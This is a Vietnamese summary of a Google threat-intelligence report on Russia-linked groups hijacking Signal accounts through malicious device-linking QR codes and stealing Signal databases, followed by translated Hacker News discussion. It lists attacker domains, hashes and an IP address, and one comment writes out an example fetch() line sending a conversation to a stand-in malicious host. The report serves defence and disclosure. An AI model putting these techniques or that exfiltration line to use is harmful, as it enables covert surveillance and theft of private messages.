Các tác nhân đe dọa liên quan đến Nga tích cực nhắm vào Signal Messenger
(cloud.google.com)- Các tài khoản Signal được những đối tượng mà cơ quan tình báo Nga quan tâm sử dụng đang trở thành mục tiêu tập trung, với số nỗ lực xâm phạm tài khoản nhằm vào liên lạc nhạy cảm của chính phủ và quân đội ngày càng tăng
- Thủ đoạn được dùng rộng rãi nhất là lạm dụng tính năng Linked Devices hợp lệ để khiến nạn nhân quét mã QR độc hại, sau đó đồng bộ tin nhắn theo thời gian thực sang thiết bị của kẻ tấn công
- UNC5792 nhắm vào liên kết thiết bị bằng lời mời nhóm Signal giả; UNC4221 dùng bộ công cụ phishing chủ đề Kropyva và cảnh báo bảo mật giả; APT44 lợi dụng quyền truy cập vào thiết bị bị thu giữ
- APT44, Turla, UNC1151 liên quan đến Belarus và các nhóm khác cũng vận hành khả năng đánh cắp cơ sở dữ liệu Signal hoặc tin nhắn và tệp đính kèm của Signal Desktop trên môi trường Android và Windows
- Vấn đề không chỉ giới hạn ở Signal; WhatsApp và Telegram cũng bị nhắm mục tiêu tương tự, vì vậy cần cập nhật ứng dụng, kiểm tra thiết bị đã liên kết, thận trọng với mã QR và dùng khóa màn hình mạnh
Hoạt động liên quan đến Nga nhắm vào tài khoản Signal
- Google Threat Intelligence Group (GTIG) xác nhận nhiều tác nhân đe dọa liên quan đến nhà nước Nga đang gia tăng các nỗ lực xâm phạm tài khoản Signal Messenger
- Mục tiêu chính là những cá nhân mà cơ quan tình báo Nga quan tâm; sau cuộc tái xâm lược Ukraine, nhu cầu thời chiến nhằm truy cập thông tin liên lạc nhạy cảm của chính phủ và quân đội đã khiến hoạt động này gia tăng
- Signal là trình nhắn tin bảo mật được binh sĩ, chính trị gia, nhà báo, nhà hoạt động và các cộng đồng rủi ro cao sử dụng, nên trở thành mục tiêu giá trị cao cho hoạt động giám sát và tình báo
- Các mối đe dọa tương tự cũng mở rộng sang những ứng dụng nhắn tin phổ biến khác như WhatsApp và Telegram, với các nhóm liên quan đến Nga áp dụng kỹ thuật tương tự
- Các bản phát hành Android và iOS mới nhất của Signal có bao gồm các tính năng tăng cường giúp phòng vệ trước những chiến dịch phishing tương tự
- Người dùng cần cập nhật lên phiên bản mới nhất để sử dụng các tính năng này
Cách lạm dụng tính năng Linked Devices
- Kỹ thuật mới nhất và được dùng rộng rãi nhất là lạm dụng linked devices, một tính năng hợp lệ của Signal
- Để sử dụng đồng thời trên nhiều thiết bị, Signal thường yêu cầu quét mã QR khi liên kết thêm thiết bị
- Tác nhân đe dọa tạo mã QR độc hại để khi nạn nhân quét, một phiên bản Signal do kẻ tấn công kiểm soát sẽ được liên kết với tài khoản của nạn nhân
- Khi liên kết thành công, các tin nhắn sau đó được đồng bộ và chuyển theo thời gian thực tới cả nạn nhân lẫn kẻ tấn công, cho phép tiếp tục nghe lén các cuộc trò chuyện bảo mật mà không cần xâm phạm toàn bộ thiết bị
- Trong phishing từ xa, mã QR độc hại thường được ngụy trang như sau
- Lời mời vào nhóm Signal
- Cảnh báo bảo mật
- Hướng dẫn ghép đôi thiết bị hợp lệ trên website Signal
- Trong các chiến dịch phishing từ xa được tùy biến kỹ hơn, mã QR liên kết thiết bị độc hại được nhúng vào trang phishing trông giống ứng dụng chuyên dụng mà quân đội Ukraine sử dụng
- Cách thức tương tự cũng được dùng trong các chiến dịch tiếp cận cự ly gần
- APT44 cho phép quân đội Nga triển khai trên chiến trường liên kết tài khoản Signal trên thiết bị thu giữ được với hạ tầng do kẻ tấn công kiểm soát để tiếp tục khai thác
- Xâm phạm tài khoản thông qua thiết bị mới liên kết dễ trở thành điểm truy cập ban đầu tín hiệu thấp vì thiếu cơ chế phát hiện và phòng vệ kỹ thuật tập trung
- Nếu thành công, có nguy cơ việc xâm phạm không bị phát hiện trong thời gian dài
UNC5792: Lời mời nhóm Signal bị chỉnh sửa
- UNC5792 là một cụm hoạt động bị nghi là gián điệp Nga và có một phần trùng lặp với UAC-0195 của CERT-UA
- Nhóm này chỉnh sửa trang group invite hợp lệ của Signal để dùng trong các chiến dịch phishing
- Trong luồng hợp lệ, người dùng được chuyển hướng vào nhóm Signal, nhưng trang bị chỉnh sửa sẽ đưa nạn nhân tới URL độc hại để liên kết thiết bị do kẻ tấn công kiểm soát với tài khoản Signal của nạn nhân
- Hạ tầng do kẻ tấn công kiểm soát được cấu hình để trông như lời mời nhóm Signal hợp pháp
- JavaScript của lời mời nhóm giả bị thay thế bằng một khối độc hại chứa URI liên kết thiết bị Signal mới dạng
sgnl://linkdevice?uuid=, thay vì chuyển hướng tham gia nhóm Signal thông thường - Miền ví dụ được xác nhận là
signal-groups[.]tech
UNC4221: Bộ công cụ phishing Signal tùy biến
- UNC4221 là tác nhân đe dọa liên quan đến Nga được CERT-UA theo dõi là UAC-0185, tích cực nhắm vào các tài khoản Signal mà quân nhân Ukraine sử dụng
- Nhóm này vận hành bộ công cụ phishing Signal tùy biến trông giống các thành phần của ứng dụng Kropyva được quân đội Ukraine dùng để dẫn bắn pháo binh
- Tương tự UNC5792, UNC4221 cũng che giấu chức năng liên kết thiết bị dưới dạng lời mời nhóm Signal từ liên hệ đáng tin cậy
- Các biến thể bộ công cụ phishing được quan sát có nhiều hình thức
- Website phishing chuyển hướng nạn nhân tới hạ tầng phishing thứ cấp trông giống hướng dẫn liên kết thiết bị hợp lệ do Signal cung cấp
- Website nhúng trực tiếp mã QR liên kết thiết bị độc hại vào bộ công cụ phishing chủ đề Kropyva cơ bản
- Trang phishing trong các chiến dịch đầu năm 2022 được tạo để trông như cảnh báo bảo mật hợp lệ của Signal
- Các miền và trang ví dụ gồm
signal-confirm[.]site,teneta.add-group[.]site,signal-protect[.]host, v.v. - UNC4221 cũng dùng một payload JavaScript nhẹ tên PINPOINT như thành phần cốt lõi trong việc nhắm mục tiêu Signal
- PINPOINT thu thập thông tin người dùng cơ bản và dữ liệu vị trí bằng GeoLocation API của trình duyệt
- Trong các chiến dịch tương tự về sau, nhiều khả năng cả tin nhắn bảo mật và dữ liệu vị trí sẽ cùng bị nhắm đến
- Hai loại dữ liệu này đặc biệt bị nhắm tới cùng nhau trong bối cảnh các chiến dịch giám sát mục tiêu hoặc hỗ trợ hoạt động quân sự thông thường
Hoạt động liên quan đến Nga và Belarus nhằm đánh cắp tin nhắn Signal
- Ngoài cách liên kết thêm thiết bị vào tài khoản nạn nhân, nhiều tác nhân đe dọa khu vực đã biết còn vận hành khả năng đánh cắp tệp cơ sở dữ liệu Signal trên thiết bị Android và Windows
- APT44 sử dụng một script Windows Batch nhẹ tên WAVESIGN
- Truy vấn định kỳ tin nhắn Signal từ cơ sở dữ liệu Signal của nạn nhân
- Rò rỉ các tin nhắn gần đây bằng Rclone
- Mã độc Android Infamous Chisel do Security Service of Ukraine (SSU) của Ukraine và National Cyber Security Centre (NCSC) của Anh báo cáo năm 2023 được quy kết cho Sandworm
- Mã độc này được thiết kế để tìm kiếm đệ quy danh sách phần mở rộng tệp, bao gồm cơ sở dữ liệu cục bộ của nhiều ứng dụng nhắn tin như Signal, trên thiết bị Android
- Turla là tác nhân đe dọa Nga được quy kết cho FSB Center 16 của Nga
- Sau khi xâm nhập, nhóm này vận hành script PowerShell nhẹ để chuẩn bị trích xuất tin nhắn Signal Desktop trong môi trường Windows
- UNC1151 liên quan đến Belarus sử dụng tiện ích dòng lệnh Robocopy
- Dàn dựng nội dung trong thư mục tệp nơi Signal Desktop lưu tin nhắn và tệp đính kèm để có thể rò rỉ về sau
Biện pháp phòng vệ cho người dùng trình nhắn tin bảo mật
- Việc nhiều tác nhân đe dọa tập trung vào Signal cho thấy mối đe dọa đối với ứng dụng nhắn tin bảo mật có thể gia tăng trong ngắn hạn
- Cùng với sự phát triển của ngành spyware thương mại và sự gia tăng các biến thể mã độc di động được sử dụng tại khu vực xung đột, nhu cầu về năng lực tấn công mạng nhằm giám sát liên lạc nhạy cảm đang tăng lên
- Mối đe dọa không chỉ dừng ở các chiến dịch mạng từ xa như phishing và phát tán mã độc
- Chiến dịch tiếp cận cự ly gần, trong đó kẻ tấn công có thể truy cập trong chốc lát vào thiết bị đã mở khóa của mục tiêu, cũng là rủi ro quan trọng
- Không chỉ Signal, WhatsApp và Telegram cũng nằm trong các ưu tiên nhắm mục tiêu gần đây của nhiều nhóm liên quan đến Nga
- Microsoft Threat Intelligence đã đề cập trong bài blog gần đây về chiến dịch trong đó COLDRIVER, UNC4057 và Star Blizzard tìm cách lạm dụng tính năng Linked Devices để xâm phạm tài khoản WhatsApp
- Người dùng có thể trở thành mục tiêu của hoạt động xâm nhập do chính phủ hậu thuẫn nên áp dụng các thói quen phòng vệ sau
- Bật khóa màn hình trên mọi thiết bị di động và dùng mật khẩu dài, phức tạp, kết hợp chữ hoa, chữ thường, số và ký hiệu
- Android hỗ trợ mật khẩu chữ-số, cung cấp mức bảo mật cao hơn nhiều so với PIN số hoặc hình vẽ mở khóa
- Cài đặt bản cập nhật hệ điều hành càng sớm càng tốt và luôn giữ Signal cùng các ứng dụng nhắn tin khác ở phiên bản mới nhất
- Bật Google Play Protect, vốn được kích hoạt mặc định trên thiết bị Android có Google Play Services
- Thường xuyên kiểm tra mục “Linked devices” trong phần cài đặt ứng dụng để xem có thiết bị chưa được phê duyệt hay không
- Thận trọng với mã QR và tài nguyên web trông như bản cập nhật phần mềm, lời mời nhóm hoặc thông báo khác, đồng thời thúc giục hành động ngay lập tức
- Khi có thể, dùng xác thực hai bước như vân tay, nhận diện khuôn mặt, khóa bảo mật hoặc mã dùng một lần để xác minh đăng nhập tài khoản hoặc liên kết thiết bị mới
- Người dùng iPhone lo ngại bị giám sát có chủ đích hoặc hoạt động tình báo nên cân nhắc bật Lockdown Mode để giảm bề mặt tấn công
Chỉ báo xâm phạm và tóm tắt kỹ thuật quan sát được
- Để hỗ trợ các tổ chức săn tìm và nhận diện, các chỉ báo xâm phạm được đưa vào GTI Collection dành cho người dùng đã đăng ký
- Ví dụ chỉ báo xâm phạm liên quan như sau
- UNC5792:
e078778b62796bab2d7ab2b04d6b01bf, ví dụ mã HTML lời mời nhóm bị chỉnh sửa - Trang phishing lời mời nhóm giả của UNC5792:
add-signal-group[.]com,add-signal-groups[.]com,group-signal[.]com,groups-signal[.]site,signal-device-off[.]online,signal-group-add[.]com,signal-group[.]site,signal-group[.]tech,signal-groups-add[.]com,signal-groups[.]site,signal-groups[.]tech,signal-security[.]online,signal-security[.]site,signalgroup[.]site,signals-group[.]com - Trang phishing hướng dẫn liên kết thiết bị của UNC4221:
signal-confirm[.]site,confirm-signal[.]site - Cảnh báo bảo mật Signal giả của UNC4221:
signal-protect[.]host - Lời mời nhóm Kropyva giả của UNC4221:
teneta.join-group[.]online,teneta.add-group[.]site,group-teneta[.]online,helperanalytics[.]ru,teneta[.]group,group.kropyva[.]site - APT44:
150.107.31[.]194:18000, mã QR liên kết thiết bị được tạo động do APT44 cung cấp - Script Batch WAVESIGN của APT44:
a97a28276e4f88134561d938f60db495,b379d8f583112cad3cf60f95ab3a67fd,b27ff24870d93d651ee1d8e06276fa98
- UNC5792:
- Chiến thuật và kỹ thuật quan sát được theo từng tác nhân đe dọa như sau
- UNC5792: Ghép đôi tin nhắn Signal của nạn nhân với thiết bị do kẻ tấn công kiểm soát bằng phishing từ xa sử dụng lời mời nhóm giả
- UNC4221: Ghép đôi tin nhắn Signal của nạn nhân với thiết bị do kẻ tấn công kiểm soát bằng phishing từ xa sử dụng ứng dụng web quân sự giả và cảnh báo bảo mật giả
- APT44: Lạm dụng thiết bị có quyền truy cập vật lý để ghép đôi tin nhắn Signal của nạn nhân với thiết bị do kẻ tấn công kiểm soát
- APT44: Nhắm đến việc rò rỉ tệp cơ sở dữ liệu Signal bằng mã độc Android Infamous Chisel
- APT44: Định kỳ rò rỉ tin nhắn Signal gần đây qua Rclone bằng script Windows Batch
- Turla: Thực hiện hoạt động đánh cắp cơ sở dữ liệu Signal Desktop sau khi xâm nhập môi trường Windows
- UNC1151: Chuẩn bị trích xuất thư mục tệp Signal Desktop bằng Robocopy
2 bình luận
Đúng là có lỗ hổng thật, nhưng việc Telegram — vốn còn chẳng mã hóa tử tế cả chat nhóm — lại đi chỉ trích về mặt bảo mật thì đúng là buồn cười.
Các ý kiến trên Hacker News
Các ứng dụng có workflow thiết bị được liên kết như Signal đã tiềm ẩn rủi ro từ khá lâu rồi
Năm ngoái khi Telegram chê bai Signal, họ cũng đã chỉ ra điểm này (https://news.ycombinator.com/context?id=40303736), và tôi cho rằng cách Signal triển khai thiết bị được liên kết đã có vấn đề từ lâu: https://eprint.iacr.org/2021/626.pdf
Điều đáng ngạc nhiên hơn là phải mất lâu như vậy các trường hợp tấn công thực tế mới xuất hiện trong tài liệu công khai. Việc Signal xem cuộc tấn công này nằm ngoài mô hình đe dọa của họ cũng không giúp ích gì. Theo bài báo đó, Signal nhận được báo cáo vào ngày 20/10/2020 và phản hồi vào ngày 28/10, nói rằng họ không đưa việc lộ khóa bí mật dài hạn vào mô hình đối thủ
Nếu vậy thì phải có quyền truy cập vật lý vào một trong các thiết bị của nạn nhân hoặc có một backdoor nào khác, mà đến mức đó thì chẳng phải đã thua rồi sao. Nếu tôi sai, xin hãy sửa. Bảo mật phần cứng vật lý và chống phishing dường như vẫn là trọng tâm
Ngoài phòng thí nghiệm, cách để lấy được nó nhìn chung chỉ là có quyền root trên thiết bị của người dùng, hoặc đánh cắp bản sao lưu trò chuyện gần đây. Chiến dịch mà Google phát hiện gần với phishing hơn nên về mặt kỹ thuật thì ít nghiêm trọng hơn, nhưng làm sao cảnh báo người dùng rằng họ đang thực hiện một hành động nguy hiểm là bài toán khó liên quan đến toàn bộ mảng bảo mật khả dụng. Khi việc thêm thiết bị liên kết mới bắt đầu sao chép cả lịch sử tin nhắn và tệp đính kèm trong 45 ngày gần nhất, đây sẽ là vấn đề ngày càng quan trọng hơn với Signal
Điều tôi cảm nhận rõ hơn gần đây là mã hóa đầu cuối rốt cuộc phải cho phép người dùng cuối tự build và xác minh client
Tôi đang làm một dịch vụ chat AI mã hóa dựa trên CRDT được mã hóa, nhưng chỉ cần chèn một dòng
fetchhoặc một tracker phân tích ở phía render là lớp bảo mật mà giao thức cam kết trở nên vô dụng. Xa hơn nữa, còn phải tin cả hệ điều hành nơi phần render được chạyDù có biến client thành mã nguồn mở và cho build tái lập được, vẫn phải phân phối qua iOS Store, và bất cứ chuyện gì cũng có thể xảy ra trong quá trình đăng tải. Tôi lấy iOS làm ví dụ vì việc đưa app tự build lên đó đặc biệt khó. Nếu là chat nhiều bên thì phía bên kia cũng phải trải qua cùng quy trình
Dù dùng đủ loại giao thức hay ho và mã hóa lớp truyền tải tốt nhất, cuối cùng tất cả vẫn là vấn đề niềm tin. Tôi lo rằng khi dùng thứ như Signal, người ta lại trở thành mục tiêu giám sát dưới ảo tưởng rằng đó là một môi trường hoàn toàn an toàn. Nếu cơ quan chính phủ muốn giám sát, có lẽ họ sẽ tập trung nguồn lực vào người dùng Signal, những người có nhiều thứ cần che giấu nhất
Đôi khi tôi cảm thấy ngoài kho lưu trữ mã hóa ra thì mọi thứ đều vô nghĩa. Cũng lạ là phần lớn thảo luận chỉ dừng ở tính đúng đắn của các giao thức bảo mật lấy toán học làm trung tâm. Chỉ một dòng
fetch("[https://malvevolentactor.com](<https://malvevolentactor.com>)", {body: JSON.stringify(convo)})ở tầng render là có thể vòng qua tất cả, nên tôi tò mò mọi người nghĩ gì về chuyện nàyViệc loại bỏ niềm tin có vẻ là bất khả thi; ta chỉ chuyển đối tượng cần tin sang nơi khác hoặc giấu nó sau một lớp trừu tượng. Điều sẽ ngày càng quan trọng là các cơ chế giúp chứng minh rõ ràng và quy trách nhiệm khi một chủ thể đã được tin ở mức nào đó hành xử ác ý
Ví dụ như log minh bạch chứng chỉ để ngăn tấn công trung gian, build tái lập để kiểm tra binary nhận được có khớp với mã nguồn mở công khai hay không, và minh bạch khóa trong WhatsApp/Signal/iMessage để kiểm tra mình nhận được khóa công khai mong đợi chứ không phải khóa của NSA
Một hệ thống cố quá mức để an toàn có thể khiến người dùng không đọc được chính tin nhắn của mình, và cuối cùng đẩy họ sang hệ thống kém an toàn hơn. Matrix cũng từng gặp vấn đề vì client không thông báo rõ rằng nếu đăng xuất thì người dùng có thể vĩnh viễn bỏ lỡ tin nhắn
Một số yêu cầu mạnh như bảo mật chuyển tiếp hoàn toàn có thể xung đột với điều người dùng thực tế muốn ở nhắn tin. Điều người dùng muốn là “tin nhắn của tôi thì lúc nào tôi cũng xem được, còn người khác thì tuyệt đối không xem được”, nhưng điều đó rất khó. Có một sự căng thẳng căn bản giữa bảo mật, đặt lại mật khẩu và khôi phục khi mất điện thoại
Nếu mọi người hiểu đầy đủ các hệ quả có thể xảy ra, khá nhiều người có thể sẽ không muốn dạng mã hóa đầu cuối mạnh nhất. Thay vào đó, họ có thể muốn bảo đảm pháp lý mạnh kiểu “ai xem tin nhắn của tôi thì đi tù cả đời”. Có người muốn mức bảo mật kỹ thuật cao nhất, nhưng nếu thiết kế theo ưu tiên đó thì có thể gây phản tác dụng với những người dùng không chấp nhận các đánh đổi ấy
Người quan tâm tới mức bảo mật đó hẳn sẽ cố dùng thứ khác thay vì iPhone. Việc những người ủng hộ Signal gọi người dùng các hệ thống mật mã mà họ không thích là LARPer trông giống một kiểu phóng chiếu điển hình. Ngoài trường hợp làm việc cho chính phủ Mỹ, tôi không rõ mô hình đe dọa thực tế mà Signal thật sự phù hợp là gì
Rõ ràng cũng có hiệu ứng cột đèn khi các nhà nghiên cứu mật mã học thuật tập trung vào thuật toán toán học. Ngày nay phạm vi có thể nhận tài trợ nghiên cứu bảo mật đã rộng hơn một chút, bao gồm cả các mô hình đồ chơi của giao thức nhắn tin đầu cuối, nhưng vẫn chưa đủ để bao quát toàn bộ chặng người-với-người thực sự quan trọng
Về cơ bản, đây là cách để một gốc tin cậy ký xác nhận, giúp kiểm tra không nghi ngờ rằng thực thể đang tương tác đến từ điện thoại+hệ điều hành+ứng dụng nào
Android có cơ chế này; ví dụ có thể xác nhận với bên thứ ba rằng bootloader đang bị khóa, có chữ ký của Google, và hệ điều hành của Google đang chạy. Về lý thuyết cũng có thể đặt một chuỗi tin cậy khác để khiến đối tác từ xa chấp nhận phần mềm “gốc” như điện thoại Google+Lineage OS
Ứng dụng cũng có thể xác minh chữ ký app mà hệ điều hành truy cập được và cung cấp cho đối tác từ xa nếu cần. Một kết quả chứng thực hoàn toàn minh bạch, không tin mù quáng vào một chủ thể duy nhất như Google, có thể dùng một sổ cái chứa hash và binary của các thành phần cần xác minh thay vì gốc tin cậy bằng chữ ký
Tất cả đều khả thi về mặt kỹ thuật, nhưng ngày nay chưa được triển khai theo cách thực sự khả dụng. Nếu có đủ quan tâm, tôi nghĩ cuối cùng nó sẽ được triển khai
Khi đó gần như chẳng có gì được mã hóa, làm bất cứ việc gì trên Wi-Fi công cộng chẳng khác nào chơi roulette Nga, và các cơ quan tình báo tín hiệu đang hưởng thời hoàng kim. Thời đó, mã hóa mạng là ưu tiên cao hơn
Bài viết không ghi rõ, nhưng theo tôi hiểu thì bước đầu của một trong các cuộc tấn công là lấy smartphone của binh sĩ đã tử trận
Nếu thành công, các tin nhắn sau đó sẽ được chuyển tới nạn nhân và kẻ tấn công đồng thời theo thời gian thực
Nhưng smartphone cung cấp cho mọi binh sĩ một nền tảng tính toán và liên lạc mạnh mà không cần đào tạo riêng. Vấn đề là làm sao để khiến nó an toàn, bao gồm cả các rủi ro trong bình luận cấp trên
Chắc hẳn có ai đó đang nghiên cứu cách bảo vệ đủ tốt để cả cơ quan tình báo Nga cũng không khai thác hiệu quả được. Nếu những giải pháp như vậy được phổ biến rộng rãi, chúng cũng có thể áp dụng tốt cho quyền riêng tư của dân thường. Bảo vệ điện thoại của dân thường Ukraine khỏi kẻ tấn công Nga cũng không phải ý tưởng tệ
Nếu ý đang nói rằng chỉ cần quét mã QR một lần là có thể liên kết thiết bị, thì tôi nghĩ đó chẳng phải là một lỗ hổng sao
Không nên để thiết bị được liên kết chỉ bằng việc quét mã; cần có xác nhận thủ công kiểu như “Có, tôi sẽ liên kết với thiết bị này”. Khi đó, dù người dùng quét vì tưởng đó là mã mời nhóm, họ vẫn có thể nhận ra thực tế không phải vậy. Tất nhiên người dùng vẫn phải nhận ra, nhưng đây là cải thiện có ý nghĩa so với việc “tưởng là mã tham gia nhóm nên quét, rồi một thiết bị khác âm thầm được liên kết”
Nhiều người dùng không hiểu, cũng không suy nghĩ kỹ về những thứ như mã QR, liên kết hay kết nối. Họ đoán một cách tức thì, theo bản năng rồi bấm, và thường bấm chỉ để dọn thứ đó khỏi màn hình rồi quay lại việc đang làm. Tôi không biết có cơ sở nào để nói là không có bước xác nhận hay không; có lẽ xem tài liệu của Signal sẽ biết
Bài liên quan: https://www.wired.com/story/russia-signal-qr-code-phishing-a... (https://web.archive.org/web/20250219110740/https://www.wired..., https://archive.ph/MbR9e)
Tôi thấy qua https://news.ycombinator.com/item?id=43103692 nhưng ở đó không có bình luận
Tin tốt là có lý do khiến nó bị nhắm mục tiêu. Điều đó có nghĩa là Signal vẫn còn hiệu quả
Có nhiều tiếng nói muốn nói rằng Signal đã bị xâm phạm, nhưng trong hầu hết mọi trường hợp cần lưu ý rằng phía đó có mức độ mã nguồn mở thấp hơn Signal
Signal đang cố hết sức để bảo vệ nhân quyền ngay cả khi trở thành một công ty ở quy mô web. Phẩm giá cá nhân là quan trọng. Đây không phải là một cuộc trò chuyện đơn giản
Tôi xem lướt thành viên hội đồng quản trị trên website của Signal Foundation thì thấy những cụm như Council on Foreign Relations, World Economic Forum Young Global Leader, security fellow của Truman National Security Project, Foreign Affairs Policy Board của U.S. Department of State
Những người như vậy nghe như một phần của thế giới tình báo. Tôi tò mò họ chính xác đang làm gì trong hội đồng quản trị của Signal, một ứng dụng nhắn tin mã nguồn mở. Tôi đồng ý rằng đây không phải là một cuộc trò chuyện đơn giản
Nếu Signal an toàn, phía tấn công quyền riêng tư sẽ muốn mọi người tin rằng Signal đã bị xâm phạm và chuyển sang dùng thứ khác. Nếu không an toàn, ngược lại họ sẽ muốn mọi người tin rằng Signal an toàn
Tôi cho rằng giải pháp là hoàn toàn phớt lờ các nguồn có khả năng phát tán thông tin sai lệch, đặc biệt là người dùng ngẫu nhiên trên mạng xã hội. Bao gồm cả HN. Điều này khó khi trọng tâm xã hội nằm ở những nơi như vậy, và ta phải tự tách mình ra. Nên giới hạn trong các tiếng nói hợp pháp và đáng tin cậy
“MongoDB có quy mô web. Chỉ cần bật lên là tự mở rộng ngay”
Có thể kiểm tra trong menu cài đặt xem có thiết bị đã liên kết nào bất thường không
Chẳng hạn hiển thị một biểu tượng nhỏ kiểu “3 thiết bị đang kết nối” là được
Họ cung cấp một số tên miền nhưng không phải tất cả đều đã được đăng ký
Ví dụ
signal-protect[.]hostvàkropyva[.]sitevẫn có thể đăng ký, cònsignal-confirm[.]siteđược đăng ký ở Ukraine. Một số được đăng ký ở NgaKhông nên tin bất kỳ bên nào trong một quốc gia đang có chiến tranh. A đổ lỗi cho B và B đổ lỗi cho A, nhưng cả hai bên đều có chương trình nghị sự riêng
signal-confirm[.]siteđược đăng ký ở Ukraine, dữ liệu WHOIS thường là giả nên khó lấy đó làm căn cứNga được biết là cũng sử dụng thông tin xác thực hoặc SIM bị chiếm đoạt từ các nước láng giềng, bao gồm Ukraine, cho những việc như thế này
Đáng tiếc là các tác nhân nhà nước Nga cũng không gặp vấn đề gì khi hoạt động bên trong Ukraine. Thêm vào đó là những tội phạm hỗn loạn đi theo bên trả nhiều tiền hơn, cùng những người qua lại hằng ngày giữa các vùng bị Nga tạm chiếm và Ukraine, mọi thứ nhanh chóng trở nên phức tạp